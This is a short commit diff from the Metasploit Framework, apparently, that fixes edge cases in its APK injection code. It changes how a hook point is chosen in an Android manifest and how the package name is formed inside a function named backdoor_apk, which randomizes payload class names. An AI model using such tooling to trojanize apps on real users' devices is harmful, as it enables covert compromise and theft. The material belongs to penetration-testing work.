Land rapid7#8946, fix rapid7#8879, APK injection edge cases

Brent Cook · Brent Cook · commit d73e95e7dbe3 · 2017-09-23T20:48:12.000-04:00
diff --git a/lib/msf/core/payload/apk.rb b/lib/msf/core/payload/apk.rb
@@ -41,7 +41,10 @@ def find_hook_point(amanifest)
     application = amanifest.xpath('//application')
     application_name = application.attribute("name")
     if application_name
-      return application_name.to_s
+      application_str = application_name.to_s
+      unless application_str == 'android.app.Application'
+        return application_str
+      end
     end
     activities = amanifest.xpath("//activity|//activity-alias")
     for activity in activities
@@ -221,7 +224,7 @@ def backdoor_apk(apkfile, raw_payload)
     FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali")
 
     package = amanifest.xpath("//manifest").first['package']
-    package = package + ".#{Rex::Text::rand_text_alpha_lower(5)}"
+    package = package.downcase + ".#{Rex::Text::rand_text_alpha_lower(5)}"
     classes = {}
     classes['Payload'] = Rex::Text::rand_text_alpha_lower(5).capitalize
     classes['MainService'] = Rex::Text::rand_text_alpha_lower(5).capitalize
